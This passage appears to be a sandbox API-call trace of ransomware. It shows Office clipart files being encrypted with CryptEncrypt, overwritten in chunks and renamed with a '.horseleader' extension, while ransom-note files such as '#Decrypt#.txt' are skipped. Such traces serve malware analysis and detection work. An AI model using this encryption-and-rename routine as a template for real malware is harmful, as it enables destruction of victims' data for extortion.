lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0253.214] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0253.215] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0253.215] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x10ca, lpOverlapped=0x0) returned 1 [0253.215] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffef36, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0253.215] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x10ca, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x10ca, lpOverlapped=0x0) returned 1 [0253.215] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0253.215] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0253.215] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0253.216] CloseHandle (hObject=0x158) returned 1 [0253.216] GetProcessHeap () returned 0x780000 [0253.216] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 
[0253.216] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD08773_.WMF.horseleader") returned 79 [0253.216] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD08773_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd08773_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD08773_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd08773_.wmf.horseleader")) returned 1 [0253.217] GetProcessHeap () returned 0x780000 [0253.217] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0253.217] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73d19900, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x5f455930, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x73d19900, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0xbb7c, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="BD08808_.WMF", cAlternateFileName="")) returned 1 [0253.217] lstrcmpiW (lpString1="BD08808_.WMF", lpString2="Windows") returned -1 [0253.217] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD08808_.WMF") returned 67 [0253.217] StrStrIW (lpFirst="BD08808_.WMF", lpSrch=".horseleader") returned 0x0 [0253.217] lstrcmpW (lpString1="BD08808_.WMF", lpString2="#Decrypt#.txt") returned 1 [0253.217] lstrcmpW (lpString1="BD08808_.WMF", lpString2="_uninstalling_.png") returned 1 [0253.217] lstrlenW (lpString=".testttjffg") returned 11 [0253.217] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD08808_.WMF", lpSrch=".testttjffg") 
returned 0x0 [0253.218] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0253.218] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0253.218] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD08808_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd08808_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0253.218] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD08808_.WMF") returned 67 [0253.218] StrStrW (lpFirst="BD08808_.WMF", lpSrch=".txt") returned 0x0 [0253.218] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=47996) returned 1 [0253.219] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0253.221] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0253.221] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0253.222] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0253.222] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: 
lpNewFilePointer=0xffffffff) returned 1 [0253.222] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0253.223] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x1b7c, lpOverlapped=0x0) returned 1 [0253.223] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffe484, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0253.223] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x1b7c, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x1b7c, lpOverlapped=0x0) returned 1 [0253.223] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0253.223] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0253.223] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0253.223] CloseHandle (hObject=0x158) returned 1 [0253.224] GetProcessHeap () returned 0x780000 [0253.224] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0253.224] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD08808_.WMF.horseleader") returned 79 [0253.224] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft 
Office\\CLIPART\\PUB60COR\\BD08808_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd08808_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD08808_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd08808_.wmf.horseleader")) returned 1 [0253.225] GetProcessHeap () returned 0x780000 [0253.225] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0253.225] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73d19900, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x5f455930, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x73d19900, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x9d0e, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="BD08868_.WMF", cAlternateFileName="")) returned 1 [0253.225] lstrcmpiW (lpString1="BD08868_.WMF", lpString2="Windows") returned -1 [0253.225] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD08868_.WMF") returned 67 [0253.225] StrStrIW (lpFirst="BD08868_.WMF", lpSrch=".horseleader") returned 0x0 [0253.225] lstrcmpW (lpString1="BD08868_.WMF", lpString2="#Decrypt#.txt") returned 1 [0253.225] lstrcmpW (lpString1="BD08868_.WMF", lpString2="_uninstalling_.png") returned 1 [0253.225] lstrlenW (lpString=".testttjffg") returned 11 [0253.225] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD08868_.WMF", lpSrch=".testttjffg") returned 0x0 [0253.225] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0253.225] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: 
pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0253.226] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD08868_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd08868_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0253.226] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD08868_.WMF") returned 67 [0253.226] StrStrW (lpFirst="BD08868_.WMF", lpSrch=".txt") returned 0x0 [0253.227] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=40206) returned 1 [0253.227] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0253.230] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0253.230] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0253.230] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x4d0e, lpOverlapped=0x0) returned 1 [0253.231] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb2f2, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0253.231] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x4d0e, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x4d0e, lpOverlapped=0x0) returned 1 
[0253.231] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0253.231] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0253.231] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0253.231] CloseHandle (hObject=0x158) returned 1 [0253.232] GetProcessHeap () returned 0x780000 [0253.232] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0253.232] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD08868_.WMF.horseleader") returned 79 [0253.232] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD08868_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd08868_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD08868_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd08868_.wmf.horseleader")) returned 1 [0253.233] GetProcessHeap () returned 0x780000 [0253.233] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0253.233] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73d19900, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x5178e0b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x73d19900, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0xbaaa, 
dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="BD09031_.WMF", cAlternateFileName="")) returned 1 [0253.233] lstrcmpiW (lpString1="BD09031_.WMF", lpString2="Windows") returned -1 [0253.233] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD09031_.WMF") returned 67 [0253.233] StrStrIW (lpFirst="BD09031_.WMF", lpSrch=".horseleader") returned 0x0 [0253.233] lstrcmpW (lpString1="BD09031_.WMF", lpString2="#Decrypt#.txt") returned 1 [0253.233] lstrcmpW (lpString1="BD09031_.WMF", lpString2="_uninstalling_.png") returned 1 [0253.233] lstrlenW (lpString=".testttjffg") returned 11 [0253.233] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD09031_.WMF", lpSrch=".testttjffg") returned 0x0 [0253.233] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0253.233] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0253.233] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD09031_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd09031_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0253.234] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD09031_.WMF") returned 67 [0253.234] StrStrW (lpFirst="BD09031_.WMF", lpSrch=".txt") returned 0x0 [0253.234] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=47786) returned 1 [0253.234] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, 
lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0253.238] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0253.238] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0253.238] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0253.238] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0253.239] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0253.239] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x1aaa, lpOverlapped=0x0) returned 1 [0253.239] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffe556, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0253.239] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x1aaa, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x1aaa, lpOverlapped=0x0) returned 1 [0253.239] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0253.239] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, 
lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0253.239] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0253.239] CloseHandle (hObject=0x158) returned 1 [0253.240] GetProcessHeap () returned 0x780000 [0253.240] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0253.240] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD09031_.WMF.horseleader") returned 79 [0253.240] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD09031_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd09031_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD09031_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd09031_.wmf.horseleader")) returned 1 [0253.241] GetProcessHeap () returned 0x780000 [0253.241] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0253.241] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73d19900, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x5178e0b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x73d19900, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x38cc, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="BD09194_.WMF", cAlternateFileName="")) returned 1 [0253.241] lstrcmpiW (lpString1="BD09194_.WMF", lpString2="Windows") returned -1 [0253.241] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, 
pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD09194_.WMF") returned 67 [0253.241] StrStrIW (lpFirst="BD09194_.WMF", lpSrch=".horseleader") returned 0x0 [0253.241] lstrcmpW (lpString1="BD09194_.WMF", lpString2="#Decrypt#.txt") returned 1 [0253.241] lstrcmpW (lpString1="BD09194_.WMF", lpString2="_uninstalling_.png") returned 1 [0253.241] lstrlenW (lpString=".testttjffg") returned 11 [0253.241] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD09194_.WMF", lpSrch=".testttjffg") returned 0x0 [0253.241] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0253.241] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0253.241] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD09194_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd09194_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0253.242] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD09194_.WMF") returned 67 [0253.242] StrStrW (lpFirst="BD09194_.WMF", lpSrch=".txt") returned 0x0 [0253.242] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=14540) returned 1 [0253.242] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x38cc, lpOverlapped=0x0) returned 1 [0253.247] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffc734, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0253.247] WriteFile (in: hFile=0x158, 
lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x38cc, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x38cc, lpOverlapped=0x0) returned 1 [0253.248] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0253.248] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0253.248] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0253.248] CloseHandle (hObject=0x158) returned 1 [0253.248] GetProcessHeap () returned 0x780000 [0253.248] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0253.249] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD09194_.WMF.horseleader") returned 79 [0253.249] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD09194_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd09194_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD09194_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd09194_.wmf.horseleader")) returned 1 [0253.250] GetProcessHeap () returned 0x780000 [0253.250] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0253.250] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73d19900, ftCreationTime.dwHighDateTime=0x1c7a765, 
